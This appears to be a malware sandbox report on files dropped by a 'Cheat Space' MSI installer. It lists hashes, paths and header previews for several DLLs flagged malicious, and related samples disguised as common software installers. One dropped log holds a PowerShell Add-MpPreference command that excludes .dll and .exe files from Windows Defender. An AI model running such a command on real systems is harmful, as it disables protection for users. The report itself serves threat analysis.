SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.770883453571578
Encrypted:	false
SSDEEP:	3:YWR4buWsyLBHrpHGR3XL5xSJHsfQ8W3EwAy/DIcLUZjqn:YWybuirpH63b52B+1C9g0
MD5:	78F856FCA31C813E872EF6F153AA44FE
SHA1:	2509E2A672FBA5D8A496404C78D2AE4E21F82D2F
SHA-256:	E5A2EDDB4142AB44DD36C07B807A6AC4EF21B44DC1E66A50A2E62807E52C4610
SHA-512:	B770372F3E85B62ADD32BB20EDFBD51EA13476FD056C554FA5532AC7442BD9256CFF244EC18846862E9DD47DCE68EA230FF4744BC20F40F3E0E4654881375AD3
Malicious:	false
Preview:	{"status":"success","countryCode":"US","city":"Washington Dc","timezone":"America/New_York","query":"149.18.24.110"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\9[1]

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.5219280948873621
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Preview:	0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\9[1]

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	15739597
Entropy (8bit):	3.590452220565597
Encrypted:	false
SSDEEP:	49152:ZOzIiK6G2rcfXLQ9mq3xzuDGxfiNerVzqliwZxwiM5l1u/QWDUW4L5TyzvnMG3k0:7
MD5:	38220A6FBE81A04B941D36141485E998
SHA1:	6907C7D7BB3B64F04D60D7D1D5CC067A3A3A3AD6
SHA-256:	69C083037CD3064F8611A0C23AEA72F15A0BA5E7BC203BC4E76D7ED7C774C8CD
SHA-512:	08B0BE85C8EDBAE121AF76AB951D5B9C8C49F26F1041D2322CB9A45217CE3CC48D2B9B0F01C9683BEB8CF97B8506521001C78A292BE1817C25E5234BAB17865C
Malicious:	false
Preview:	85,93,100,43,52,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,d5,65,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b6,a0,ad,e7,7a,dd,bd,e6,aa,a6,93,ae,71,c6,b6,d3,c6,b5,ac,59,d2,a8,6f,a3,c3,da,6c,bb,d9,74,9e,b6,b5,58,b1,e3,be,d2,79,84,50,3e,56,41,51,63,55,65,58,46,88,7e,70,43,9b,32,52,6c,9b,c2,12c,f9,5a,67,62,38,44,74,5a,6d,12b,77,51,35,3d,42,57,63,55,f3,a0,46,38,b3,71,43,4f,31,4e,6c,8a,fe,b3,54,5a,87,62,38,44,134,a2,6d,4b,77,83,34,32,61,51,63,55,67,58,46,3c,39,70,43,4f,31,4e,6c,50,52,6b,54,5a,67,62,38,44,f4,a4,6d,4b,7b,43,34,32,41,51,63,57,65,98,cb,38,39,80,43,4f,41,4e,6c,4c,52,7b,54,5a,77,62,38,44,74,5a,6d,5a,77,43,34,32,41,51,63,55,65,58,46,128,e4,b8,43,9a,31,4e,6c,4c,132,b3,54,e2,d7,63,38,44,74,5a,6d,4b,77,43,34,32,4d,9b,63,7d,8d,58,46,38,99,ba,43,5b,31,4e,6c,d0,fd,b3,54,76,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,5

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1348
Entropy (8bit):	5.4155366379260865
Encrypted:	false
SSDEEP:	24:3lyt9WSKco4KmBs4RPT6BmFoUebIlmjKcmZ9t7J0gt/NK3R8Cr6SVbI:1y3WSU4y4RQmFoUeUmfmZ9tK8NWR8C3q
MD5:	1AEF4CBED0FB1D852F8FF5684B497E5B
SHA1:	123CE891299460F679198369E575D21BB6DA9CF6
SHA-256:	819DCE5148D95CECED14F86C80B89634D9DE198D3DFB8BB831ED32671D7943D0
SHA-512:	A17E0F1ED505B2F44DF5E82D9B7FDA9C2BAFA0680D93FA2EC1C1FC70790201FFEC74AB26D77B94CAD150F3D4A17A860061E3DA79C3D88BC3190A91F073FCC74B
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\MSI3C62.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Cheat.Space.1.4.3.msi, Detection: malicious, Browse Filename: Cheat_Space_1.4.3.msi, Detection: malicious, Browse Filename: Cheat_Space_1.4.3_(1).msi, Detection: malicious, Browse Filename: Cheat_Space_1.4.3.msi, Detection: malicious, Browse Filename: Cheat_Lab_2.7.2.msi, Detection: malicious, Browse Filename: Cheat_Lab_2.7.2.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.2.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: AnyDesk.exe, Detection: malicious, Browse Filename: AnyDesk.exe, Detection: malicious, Browse Filename: winrar-611br.msi, Detection: malicious, Browse Filename: Firefox-x64.msi, Detection: malicious, Browse Filename: AnyDeskAPP.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI3C83.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI75E.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7EC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI80C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI82C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI84C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI89B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI939.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	919520
Entropy (8bit):	6.451406895673526
Encrypted:	false
SSDEEP:	24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
MD5:	6189CDCB92AB9DDBFFD95FACD0B631FA
SHA1:	B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
SHA-256:	519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
SHA-512:	EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...!S..!S..!S[."R..!S[.$R=.!S.%R..!S."R..!S.$R..!S[.%R..!S[. R..!S.. S..!S3.(R..!S3.!R..!S3..S..!S..S..!S3.#R..!SRich..!S........................PE..L...a<.a.........."!.....X...................p...............................@.......\|....@.........................`A..t....A.......0.......................@..L...(...p...............................@............p...............................text...nV.......X.................. ..`.rdata.......p.......\..............@..@.data...<....`.......@..............@....rsrc........0......................@..@.reloc..L....@......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI969.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI998.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI9C8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pro1BB5.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.937735805475593
Encrypted:	false
SSDEEP:	12:ISt0RiY7GSd1VIk/ko+jLbdhFp+9wkvt0Ri9qVIk/ko+jLbdhFp+9wkv:nt0vndd/ko+3bdh5wt0gQ/ko+3bdh5m
MD5:	FA3F83871A37B5B904332F6AD851F38A
SHA1:	628A558BEF01966F79A309025A9BE0538D33A0C6
SHA-256:	2DEC36E29E4EDFA5A10FBB5019E6C974166960C18AFFF6F30161096A4FA1E173
SHA-512:	D5C4005898290CB74A645C300865D504785058FEE1B45F75B6E441250D7ADD4F235C96C543D3BA6C9E949BA52B4AA2C5C21827BB3024CFCD8FEB0D4649FFB8FA
Malicious:	false
Preview:	Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Python\pip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_341pwb14.iu5.ps1

Download File

